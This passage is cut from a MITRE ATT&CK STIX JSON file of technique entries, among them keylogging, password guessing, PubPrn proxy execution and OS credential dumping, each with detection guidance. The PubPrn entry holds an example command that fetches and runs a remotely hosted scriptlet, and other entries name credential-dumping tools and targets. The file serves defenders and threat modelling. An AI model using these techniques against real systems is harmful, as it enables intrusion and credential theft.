["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-10-01T14:01:12.167Z", "name": "Keylogging", "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}, {"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["TruKno"], "x_mitre_deprecated": false, "x_mitre_detection": "Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux", "Network"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "created": "2020-02-11T18:58:11.791Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1056/001", "external_id": "T1056.001"}, {"source_name": "Talos Kimsuky Nov 2021", "description": "An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.", "url": "https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html"}, {"source_name": "Cisco Blog Legacy Device Attacks", "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"}, {"source_name": "Adventures of a Keystroke", "description": "Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.", "url": "http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:56:58.991Z", "name": "Modify Controller Tasking", "description": "Adversaries may modify the tasking of a controller to allow for the execution of their own programs. This can allow an adversary to manipulate the execution flow and behavior of a controller. \n\nAccording to 61131-3, the association of a Task with a Program Organization Unit (POU) defines a task association. (Citation: IEC February 2013) An adversary may modify these associations or create new ones to manipulate the execution flow of a controller. Modification of controller tasking can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append.\n\nTasks have properties, such as interval, frequency and priority to meet the requirements of program execution. Some controller vendors implement tasks with implicit, pre-defined properties whereas others allow for these properties to be formulated explicitly. An adversary may associate their program with tasks that have a higher priority or execute associated programs more frequently. For instance, to ensure cyclic execution of their program on a Siemens controller, an adversary may add their program to the task, Organization Block 1 (OB1).", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.2", "x_mitre_data_sources": ["Application Log: Application Log Content", "Operational Databases: Device Alarm"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", "created": "2021-04-13T11:15:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0821", "external_id": "T0821"}, {"source_name": "IEC February 2013", "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", "url": "https://webstore.iec.ch/publication/4552"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-15T23:42:39.831Z", "name": "File/Path Exclusions", "description": "Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)\n\nAdversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", "created": "2024-03-29T16:59:10.374Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/012", "external_id": "T1564.012"}, {"source_name": "Microsoft File Folder Exclusions", "description": "Microsoft. (2024, February 27). Contextual file and folder exclusions. Retrieved March 29, 2024.", "url": "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-08-14T17:54:22.970Z", "name": "Linux and Mac File and Directory Permissions Modification", "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform\u2019s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\n\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include chmod +x, chmod -R 755, and chmod 777.(Citation: 20 macOS Common Tools and Techniques) \n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Linux"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", "created": "2020-02-04T19:24:27.774Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1222/002", "external_id": "T1222.002"}, {"source_name": "Hybrid Analysis Icacls1 June 2018", "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.", "url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"}, {"source_name": "Hybrid Analysis Icacls2 May 2018", "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.", "url": "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110"}, {"source_name": "20 macOS Common Tools and Techniques", "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-16T16:57:41.743Z", "name": "Password Guessing", "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.\n\nGuessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nTypically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n* SNMP (161/UDP and 162/TCP/UDP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Microsoft Threat Intelligence Center (MSTIC)", "Mohamed Kmal"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace", "Containers", "Network"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "created": "2020-02-11T18:38:22.617Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1110/001", "external_id": "T1110.001"}, {"source_name": "Trend Micro Emotet 2020", "description": "Cybercrime & Digital Threat Team. (2020, February 13). Emotet Now Spreads via Wi-Fi. Retrieved February 16, 2022.", "url": "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi"}, {"source_name": "Cylance Cleaver", "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", "url": "https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"}, {"source_name": "US-CERT TA18-068A 2018", "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "PubPrn", "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Atul Nair, Qualys"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Digital Certificate Validation", "Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", "created": "2020-02-03T16:49:57.788Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1216/001", "external_id": "T1216.001"}, {"source_name": "pubprn", "description": "Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.", "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn"}, {"source_name": "Enigma0x3 PubPrn Bypass", "description": "Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.", "url": "https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Purchase Technical Data", "description": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.\n\nAdversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim\u2019s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f", "created": "2020-10-02T17:05:43.562Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1597/002", "external_id": "T1597.002"}, {"source_name": "ZDNET Selling Data", "description": "Cimpanu, C. (2020, May 9). A hacker group is selling more than 73 million user records on the dark web. Retrieved October 20, 2020.", "url": "https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-18T23:47:41.667Z", "name": "OS Credential Dumping", "description": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.\n\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Vincent Le Toux", "Ed Williams, Trustwave, SpiderLabs", "Tim (Wadhwa-)Brown", "Yves Yonan"], "x_mitre_deprecated": false, "x_mitre_detection": "### Windows\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nHash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. \n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)\n\n### Linux\nTo obtain the passwords and hashes stored in memory, processes must open a maps file in the `/proc` filesystem for the process being analyzed. This file is stored under the path `/proc//maps`, where the `` directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "2.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "created": "2017-05-31T21:30:19.735Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1003", "external_id": "T1003"}, {"source_name": "Medium Detecting Attempts to Steal Passwords from Memory", "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.", "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea"}, {"source_name": "AdSecurity DCSync Sept 2015", "description": "Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved December 4, 2017.", "url": "https://adsecurity.org/?p=1729"}, {"source_name": "Microsoft DRSR Dec 2017", "description": "Microsoft. (2017, December 1). MS-DRSR Directory Replication Service (DRS) Remote Protocol. Retrieved December 4, 2017.", "url": "https://msdn.microsoft.com/library/cc228086.aspx"}, {"source_name": "Microsoft NRPC Dec 2017", "description": "Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol. Retrieved December 6, 2017.", "url": "https://msdn.microsoft.com/library/cc237008.aspx"}, {"source_name": "Microsoft GetNCCChanges", "description": "Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December 4, 2017.", "url": "https://msdn.microsoft.com/library/dd207691.aspx"}, {"source_name": "Microsoft SAMR", "description": "Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.", "url": "https://msdn.microsoft.com/library/cc245496.aspx"}, {"source_name": "Powersploit", "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", "url": "https://github.com/mattifestation/PowerSploit"}, {"source_name": "Samba DRSUAPI", "description": "SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.", "url": "https://wiki.samba.org/index.php/DRSUAPI"}, {"source_name": "Harmj0y DCSync Sept 2015", "description": "Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved December 4, 2017.", "url": "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/"}, {"source_name": "Brining MimiKatz to Unix", "description": "Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.", "url": "https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-12T21:17:14.868Z", "name": "Shared Modules", "description": "Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.\n\nThe Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.(Citation: Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation: RotaJakiro 2021 netlab360 analysis)(Citation: Unit42 OceanLotus 2017)\n\nThe Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like `LoadLibrary` at run time.(Citation: Microsoft DLL)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Stefan Kanthak"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to `%SystemRoot%` and `%ProgramFiles%` directories will protect against module loads from unsafe paths. \n\nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "2.2", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", "created": "2017-05-31T21:31:40.542Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1129", "external_id": "T1129"}, {"source_name": "RotaJakiro 2021 netlab360 analysis", "description": " Alex Turing, Hui Wang. (2021, April 28). RotaJakiro: A long live secret backdoor with 0 VT detection. Retrieved June 14, 2023.", "url": "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/"}, {"source_name": "Apple Dev Dynamic Libraries", "description": "Apple. (2012, July 23). Overview of Dynamic Libraries. Retrieved September 7, 2023.", "url": "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html"}, {"source_name": "Unit42 OceanLotus 2017", "description": "Erye Hernandez and Danny Tsechansky. (2017, June 22). The New and Improved macOS Backdoor from OceanLotus. Retrieved September 8, 2023.", "url": "https://unit42.paloaltonetworks.com/unit42-new-improved-macos-backdoor-oceanlotus/"}, {"source_name": "Microsoft DLL", "description": "Microsoft. (2023, April 28). What is a DLL. Retrieved September 7, 2023.", "url": "https://learn.microsoft.com/troubleshoot/windows-client/deployment/dynamic-link-library"}, {"source_name": "Linux Shared Libraries", "description": "Wheeler, D. (2003, April 11). Shared Libraries. Retrieved September 7, 2023.", "url": "https://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Data from Configuration Repository", "description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco 